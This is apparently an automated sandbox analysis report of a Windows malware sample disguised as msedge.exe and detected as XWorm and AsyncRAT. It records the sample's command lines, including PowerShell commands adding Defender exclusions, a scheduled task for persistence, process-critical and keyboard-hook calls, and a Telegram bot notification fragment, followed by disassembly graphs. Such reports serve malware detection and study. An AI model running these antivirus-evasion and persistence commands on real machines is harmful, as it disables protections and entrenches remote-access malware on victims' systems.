                                          Data Ascii: {"ok":true,"result":{"message_id":193,"from":{"id":7483240807,"is_bot":true,"first_name":"NotifyForShadowCrypter","username":"NotifyForShadowCrypter_bot"},"chat":{"id":5279018187,"first_name":"Maxim","last_name":"Zekpot","type":"private"},"date":172270866


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:14:10:05
                                          Start date:03/08/2024
                                          Path:C:\Users\user\Desktop\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\msedge.exe"
                                          Imagebase:0x590000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:2
                                          Start time:14:10:08
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:14:10:08
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:14:10:15
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:14:10:15
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:10
                                          Start time:14:10:26
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:14:10:26
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:13
                                          Start time:14:10:42
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:14
                                          Start time:14:10:42
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:16
                                          Start time:14:11:05
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\schtasks.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0x7ff6cb8c0000
                                          File size:235'008 bytes
                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:17
                                          Start time:14:11:05
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:18
                                          Start time:14:11:07
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\msedge.exe
                                          Imagebase:0x350000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 71%, ReversingLabs
                                          • Detection: 66%, Virustotal, Browse
                                          Has exited:true

                                          General

                                          Target ID:19
                                          Start time:14:11:14
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0x3a0000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:20
                                          Start time:14:11:23
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0xb60000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:21
                                          Start time:14:12:01
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\msedge.exe
                                          Imagebase:0xdd0000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:30.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 6044 7ffd34683bbd 6045 7ffd34683bef RtlSetProcessIsCritical 6044->6045 6047 7ffd34683ca2 6045->6047 6052 7ffd346837ca 6053 7ffd346843a0 SetWindowsHookExW 6052->6053 6055 7ffd34684451 6053->6055

                                            Executed Functions

                                            Function 00007FFD3468C059 Relevance: 2.4, Strings: 1, Instructions: 1160COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 29 7ffd3468c059-7ffd3468c093 30 7ffd3468c095-7ffd3468c0a0 call 7ffd346805f0 29->30 31 7ffd3468c0dd-7ffd3468c0e5 29->31 35 7ffd3468c0a5-7ffd3468c0dc 30->35 33 7ffd3468c0e7-7ffd3468c104 31->33 34 7ffd3468c15b 31->34 36 7ffd3468c160-7ffd3468c175 33->36 39 7ffd3468c106-7ffd3468c156 call 7ffd3468b3b0 33->39 34->36 35->31 43 7ffd3468c177-7ffd3468c18e call 7ffd34680820 call 7ffd34680600 36->43 44 7ffd3468c193-7ffd3468c1a8 36->44 39->34 64 7ffd3468cd9b-7ffd3468cda9 39->64 43->64 51 7ffd3468c1aa-7ffd3468c1da call 7ffd34680820 44->51 52 7ffd3468c1df-7ffd3468c1f4 44->52 51->64 61 7ffd3468c1f6-7ffd3468c202 call 7ffd346872a8 52->61 62 7ffd3468c207-7ffd3468c21c 52->62 61->64 69 7ffd3468c21e-7ffd3468c221 62->69 70 7ffd3468c262-7ffd3468c277 62->70 69->34 72 7ffd3468c227-7ffd3468c232 69->72 76 7ffd3468c2b8-7ffd3468c2cd 70->76 77 7ffd3468c279-7ffd3468c27c 70->77 72->34 73 7ffd3468c238-7ffd3468c25d call 7ffd346805d8 call 7ffd346872a8 72->73 73->64 84 7ffd3468c2fa-7ffd3468c30f 76->84 85 7ffd3468c2cf-7ffd3468c2d2 76->85 77->34 79 7ffd3468c282-7ffd3468c28d 77->79 79->34 82 7ffd3468c293-7ffd3468c2b3 call 7ffd346805d8 call 7ffd346871d8 79->82 82->64 93 7ffd3468c315-7ffd3468c361 call 7ffd34680560 84->93 94 7ffd3468c3e7-7ffd3468c3fc 84->94 85->34 88 7ffd3468c2d8-7ffd3468c2f5 call 7ffd346805d8 call 7ffd346871e0 85->88 88->64 93->34 128 7ffd3468c367-7ffd3468c39f call 7ffd34680ed0 93->128 102 7ffd3468c41b-7ffd3468c430 94->102 103 7ffd3468c3fe-7ffd3468c401 94->103 112 7ffd3468c452-7ffd3468c467 102->112 113 7ffd3468c432-7ffd3468c435 102->113 103->34 106 7ffd3468c407-7ffd3468c416 call 7ffd346871b8 103->106 106->64 118 7ffd3468c487-7ffd3468c49c 112->118 119 7ffd3468c469-7ffd3468c482 112->119 113->34 114 7ffd3468c43b-7ffd3468c44d call 7ffd346871b8 113->114 114->64 126 7ffd3468c4bc-7ffd3468c4d1 118->126 127 7ffd3468c49e-7ffd3468c4b7 118->127 119->64 132 7ffd3468c4f1-7ffd3468c506 126->132 133 7ffd3468c4d3-7ffd3468c4ec 126->133 127->64 128->34 145 7ffd3468c3a5-7ffd3468c3e2 call 7ffd346872b8 128->145 137 7ffd3468c508-7ffd3468c50b 132->137 138 7ffd3468c52f-7ffd3468c544 132->138 133->64 137->34 140 7ffd3468c511-7ffd3468c52a 137->140 146 7ffd3468c54a-7ffd3468c563 138->146 147 7ffd3468c5e4-7ffd3468c5f9 138->147 140->64 145->64 146->147 152 7ffd3468c5fb-7ffd3468c60c 147->152 153 7ffd3468c611-7ffd3468c626 147->153 152->64 159 7ffd3468c6c6-7ffd3468c6db 153->159 160 7ffd3468c62c-7ffd3468c6a4 153->160 164 7ffd3468c6dd-7ffd3468c6ee 159->164 165 7ffd3468c6f3-7ffd3468c708 159->165 160->34 185 7ffd3468c6aa-7ffd3468c6c1 160->185 164->64 170 7ffd3468c73a-7ffd3468c74f 165->170 171 7ffd3468c70a-7ffd3468c735 call 7ffd34680b00 call 7ffd3468b3b0 165->171 178 7ffd3468c755-7ffd3468c827 call 7ffd34680b00 call 7ffd3468b3b0 170->178 179 7ffd3468c82c-7ffd3468c841 170->179 171->64 178->64 187 7ffd3468c847-7ffd3468c84a 179->187 188 7ffd3468c908-7ffd3468c91d 179->188 185->64 189 7ffd3468c8fd-7ffd3468c902 187->189 190 7ffd3468c850-7ffd3468c85b 187->190 197 7ffd3468c91f-7ffd3468c92c call 7ffd3468b3b0 188->197 198 7ffd3468c931-7ffd3468c946 188->198 200 7ffd3468c903 189->200 190->189 194 7ffd3468c861-7ffd3468c8fb call 7ffd34680b00 call 7ffd3468b3b0 190->194 194->200 197->64 206 7ffd3468c948-7ffd3468c959 198->206 207 7ffd3468c9bd-7ffd3468c9d2 198->207 200->64 206->34 213 7ffd3468c95f-7ffd3468c96f call 7ffd346805d0 206->213 215 7ffd3468ca12-7ffd3468ca27 207->215 216 7ffd3468c9d4-7ffd3468c9d7 207->216 226 7ffd3468c99b-7ffd3468c9b8 call 7ffd346805d0 call 7ffd346805d8 call 7ffd34687190 213->226 227 7ffd3468c971-7ffd3468c996 call 7ffd3468b3b0 213->227 224 7ffd3468ca29-7ffd3468ca68 call 7ffd346826a0 call 7ffd34689de0 call 7ffd34687198 215->224 225 7ffd3468ca6d-7ffd3468ca82 215->225 216->34 219 7ffd3468c9dd-7ffd3468ca0d call 7ffd346805c8 call 7ffd346805d8 call 7ffd34687190 216->219 219->64 224->64 244 7ffd3468ca88-7ffd3468cb1d call 7ffd34680b00 call 7ffd3468b3b0 225->244 245 7ffd3468cb22-7ffd3468cb37 225->245 226->64 227->64 244->64 245->64 260 7ffd3468cb3d-7ffd3468cb44 245->260 264 7ffd3468cb46-7ffd3468cb50 call 7ffd346872c8 260->264 265 7ffd3468cb57-7ffd3468cc71 call 7ffd346872d8 call 7ffd346872e8 call 7ffd346872f8 call 7ffd34687308 call 7ffd34689d00 call 7ffd34687318 call 7ffd346872e8 call 7ffd346872f8 260->265 264->265 313 7ffd3468cce2-7ffd3468ccf1 265->313 314 7ffd3468cc73-7ffd3468cc77 265->314 315 7ffd3468ccf8-7ffd3468cd91 call 7ffd34680b00 call 7ffd346805e0 call 7ffd3468b3b0 313->315 314->315 316 7ffd3468cc79-7ffd3468ccca call 7ffd34687328 call 7ffd34687338 314->316 341 7ffd3468cd98-7ffd3468cd9a 315->341 326 7ffd3468cccf-7ffd3468ccd8 316->326 326->313 341->64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 9f449f46ec61e9d27b8401c0fae2f1ced459e7253002bba2714ca14977898dc7
                                            • Instruction ID: ccd209f01625ce5f6eb182a529d7ec2532bc7c5c196c9fee475e2cabe373b35e
                                            • Opcode Fuzzy Hash: 9f449f46ec61e9d27b8401c0fae2f1ced459e7253002bba2714ca14977898dc7
                                            • Instruction Fuzzy Hash: 32828230B1C91A4FEBA4FB6884B66B973D2FF9A301F544579D54ED32C2DE2CA8029741
                                            Function 00007FFD346812D9 Relevance: 2.1, Strings: 1, Instructions: 865COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 342 7ffd346812d9-7ffd34681310 344 7ffd34681c0e 342->344 345 7ffd34681316-7ffd34681468 call 7ffd346804e8 * 9 call 7ffd346805f8 342->345 347 7ffd34681c13-7ffd34681c5a 344->347 391 7ffd34681471-7ffd346814e2 call 7ffd346804a0 call 7ffd34680358 call 7ffd34680368 345->391 392 7ffd3468146a 345->392 404 7ffd346814e4-7ffd346814ee 391->404 405 7ffd346814f5-7ffd34681505 391->405 392->391 404->405 408 7ffd3468152d-7ffd3468154d 405->408 409 7ffd34681507-7ffd34681526 call 7ffd34680358 405->409 415 7ffd3468154f-7ffd34681559 call 7ffd34680378 408->415 416 7ffd3468155e-7ffd346815c2 call 7ffd34680738 408->416 409->408 415->416 426 7ffd34681662-7ffd346816f0 416->426 427 7ffd346815c8-7ffd3468165d 416->427 447 7ffd346816f7-7ffd34681835 call 7ffd34680870 call 7ffd34680848 call 7ffd34680388 call 7ffd34680398 426->447 427->447 470 7ffd34681883-7ffd346818b6 447->470 471 7ffd34681837-7ffd3468186a 447->471 481 7ffd346818db-7ffd3468190b 470->481 482 7ffd346818b8-7ffd346818d9 470->482 471->470 478 7ffd3468186c-7ffd34681879 471->478 478->470 483 7ffd3468187b-7ffd34681881 478->483 485 7ffd34681913-7ffd3468194a 481->485 482->485 483->470 491 7ffd3468196f-7ffd3468199f 485->491 492 7ffd3468194c-7ffd3468196d 485->492 494 7ffd346819a7-7ffd34681a68 call 7ffd346803a8 call 7ffd34680490 491->494 492->494 494->347 506 7ffd34681a6e-7ffd34681ab6 494->506 506->347 511 7ffd34681abc-7ffd34681b37 call 7ffd34680598 call 7ffd34680738 506->511 524 7ffd34681b3e-7ffd34681bee call 7ffd34680498 511->524 525 7ffd34681b39 call 7ffd34680818 511->525 540 7ffd34681bf5-7ffd34681c0d 524->540 525->524
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAM_^
                                            • API String ID: 0-3136481660
                                            • Opcode ID: 4d65bf0560fd0bdeb3e18eb46c18a956cc2318ba18217d07b71dc8a2a10fcf5b
                                            • Instruction ID: fabb30d89ac3afd619a9f93ce9e37a6360f2a9e0f45ad58c5fdf3a6c5f586351
                                            • Opcode Fuzzy Hash: 4d65bf0560fd0bdeb3e18eb46c18a956cc2318ba18217d07b71dc8a2a10fcf5b
                                            • Instruction Fuzzy Hash: E252B361B18B194FEBA4EBA884B57B977D2FF99300F540579E44EC32D2DE2CA8418741
                                            Function 00007FFD3468D7C8 Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: KL_L
                                            • API String ID: 0-1452816548
                                            • Opcode ID: d21cf00a55e69310f66aab8bebe1c94f377537ec06b319473ac5dbc34513089f
                                            • Instruction ID: 968faca629687d0ae49ca6976f84be4c2613aaed2efbe2b32f1866010558f2c4
                                            • Opcode Fuzzy Hash: d21cf00a55e69310f66aab8bebe1c94f377537ec06b319473ac5dbc34513089f
                                            • Instruction Fuzzy Hash: 9BB1E562B1DA494FE794EF6C98AA3B9B7D1FFA9310F04017AD04DC3293DE2868418791
                                            Function 00007FFD34688176 Relevance: .5, Instructions: 476COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 871 7ffd34688176-7ffd34688183 872 7ffd34688185-7ffd3468818d 871->872 873 7ffd3468818e-7ffd346881b9 871->873 872->873 874 7ffd3468822b-7ffd34688257 873->874 875 7ffd346881bb-7ffd3468822a 873->875 879 7ffd34688259-7ffd34688262 874->879 880 7ffd346882c3 874->880 875->874 879->880 881 7ffd34688264-7ffd34688270 879->881 882 7ffd346882c5-7ffd346882ea 880->882 883 7ffd346882a9-7ffd346882c1 881->883 884 7ffd34688272-7ffd34688284 881->884 888 7ffd34688356 882->888 889 7ffd346882ec-7ffd346882f5 882->889 883->882 886 7ffd34688286 884->886 887 7ffd34688288-7ffd3468829b 884->887 886->887 887->887 890 7ffd3468829d-7ffd346882a5 887->890 892 7ffd34688358-7ffd34688400 888->892 889->888 891 7ffd346882f7-7ffd34688303 889->891 890->883 893 7ffd34688305-7ffd34688317 891->893 894 7ffd3468833c-7ffd34688354 891->894 903 7ffd3468846e 892->903 904 7ffd34688402-7ffd3468840c 892->904 895 7ffd34688319 893->895 896 7ffd3468831b-7ffd3468832e 893->896 894->892 895->896 896->896 898 7ffd34688330-7ffd34688338 896->898 898->894 906 7ffd34688470-7ffd34688499 903->906 904->903 905 7ffd3468840e-7ffd3468841b 904->905 907 7ffd3468841d-7ffd3468842f 905->907 908 7ffd34688454-7ffd3468846c 905->908 913 7ffd3468849b-7ffd346884a6 906->913 914 7ffd34688503 906->914 909 7ffd34688431 907->909 910 7ffd34688433-7ffd34688446 907->910 908->906 909->910 910->910 912 7ffd34688448-7ffd34688450 910->912 912->908 913->914 916 7ffd346884a8-7ffd346884b6 913->916 915 7ffd34688505-7ffd34688596 914->915 924 7ffd3468859c-7ffd346885ab 915->924 917 7ffd346884b8-7ffd346884ca 916->917 918 7ffd346884ef-7ffd34688501 916->918 919 7ffd346884cc 917->919 920 7ffd346884ce-7ffd346884e1 917->920 918->915 919->920 920->920 922 7ffd346884e3-7ffd346884eb 920->922 922->918 925 7ffd346885ad 924->925 926 7ffd346885b3-7ffd34688618 call 7ffd34688634 924->926 925->926 933 7ffd3468861a 926->933 934 7ffd3468861f-7ffd34688633 926->934 933->934
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1116c8aa553013ef5c6562be7fa7385bd468ad4831fa21d4f72aeadb31eeb2d2
                                            • Instruction ID: adb235131f3848d458a82e2f2695cb30931a0fa89b44772347951f8aa2e046a3
                                            • Opcode Fuzzy Hash: 1116c8aa553013ef5c6562be7fa7385bd468ad4831fa21d4f72aeadb31eeb2d2
                                            • Instruction Fuzzy Hash: A4F18730A0CA4E4FEBA8DF28C8557E977E1FF55310F04426EE84DC7691DB78A9458B81
                                            Function 00007FFD34688F22 Relevance: .5, Instructions: 462COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 209d80e8667f7f119ba3341f707a8ff1fc009f342a87278195ce0b411308446a
                                            • Instruction ID: c61d4857839e3aad618ca344460d3e2dad7ea4b5ca057dc1a902dd4386afa8ad
                                            • Opcode Fuzzy Hash: 209d80e8667f7f119ba3341f707a8ff1fc009f342a87278195ce0b411308446a
                                            • Instruction Fuzzy Hash: EBE1A430A0CA4D8FEBA8DF28C8657E977E1FF55310F14426ED84DC7291DE78A9458B81
                                            Function 00007FFD34681D49 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e4be3ed71c1073624a9bd26bdfb77a379e23e19aacc28eaa0ee90b2e08f80f8
                                            • Instruction ID: 8af05a2294031472cdb2d4f691689d7e80246c7c9f6a2fa81373398de4e1a4dc
                                            • Opcode Fuzzy Hash: 0e4be3ed71c1073624a9bd26bdfb77a379e23e19aacc28eaa0ee90b2e08f80f8
                                            • Instruction Fuzzy Hash: 2251FF21B1E6C90FE796AB7898752B5BFD5DF87216B0805FFE0C9C61A3DD085806C342
                                            Function 00007FFD34683BBD Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 542 7ffd34683bbd-7ffd34683ca0 RtlSetProcessIsCritical 546 7ffd34683ca2 542->546 547 7ffd34683ca8-7ffd34683cdd 542->547 546->547
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 52beb9b9d557040c330236b1ee84b4b74a82466b3e4405131ee544930aa7562e
                                            • Instruction ID: 780263c413c452e89c8cef6eb9e2d52d977704eb9b56b563d87d556fcc203721
                                            • Opcode Fuzzy Hash: 52beb9b9d557040c330236b1ee84b4b74a82466b3e4405131ee544930aa7562e
                                            • Instruction Fuzzy Hash: C141033190C7588FD729DF98D859AE9BBF0EF56311F04416ED08AD3592CB38A846CB91
                                            Function 00007FFD34684378 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 549 7ffd34684378-7ffd3468437f 550 7ffd34684381-7ffd34684389 549->550 551 7ffd3468438a-7ffd3468439a 549->551 550->551 552 7ffd346843d0-7ffd346843fd 551->552 553 7ffd3468439c-7ffd346843cc 551->553 556 7ffd34684403-7ffd34684410 552->556 557 7ffd34684489-7ffd3468448d 552->557 553->552 558 7ffd34684412-7ffd3468444f SetWindowsHookExW 556->558 557->558 560 7ffd34684451 558->560 561 7ffd34684457-7ffd34684488 558->561 560->561
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 2e41ccb8aa2610ecdfce3f34429cd81e87c2b6ddd250cdb037934aebf1e63e98
                                            • Instruction ID: 7fe9bc81a2b0c8713dd5a3570327b2266efa09b1037f3b1cd92f69dd18ec88aa
                                            • Opcode Fuzzy Hash: 2e41ccb8aa2610ecdfce3f34429cd81e87c2b6ddd250cdb037934aebf1e63e98
                                            • Instruction Fuzzy Hash: F0311931A0CA5D4FDB5CEFAC98556F9BBE1EB59321F04423ED049D3192DE64A81287C1
                                            Function 00007FFD346837CA Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 564 7ffd346837ca-7ffd346843fd 568 7ffd34684403-7ffd34684410 564->568 569 7ffd34684489-7ffd3468448d 564->569 570 7ffd34684412-7ffd3468444f SetWindowsHookExW 568->570 569->570 572 7ffd34684451 570->572 573 7ffd34684457-7ffd34684488 570->573 572->573
                                            APIs
                                            Memory Dump Source
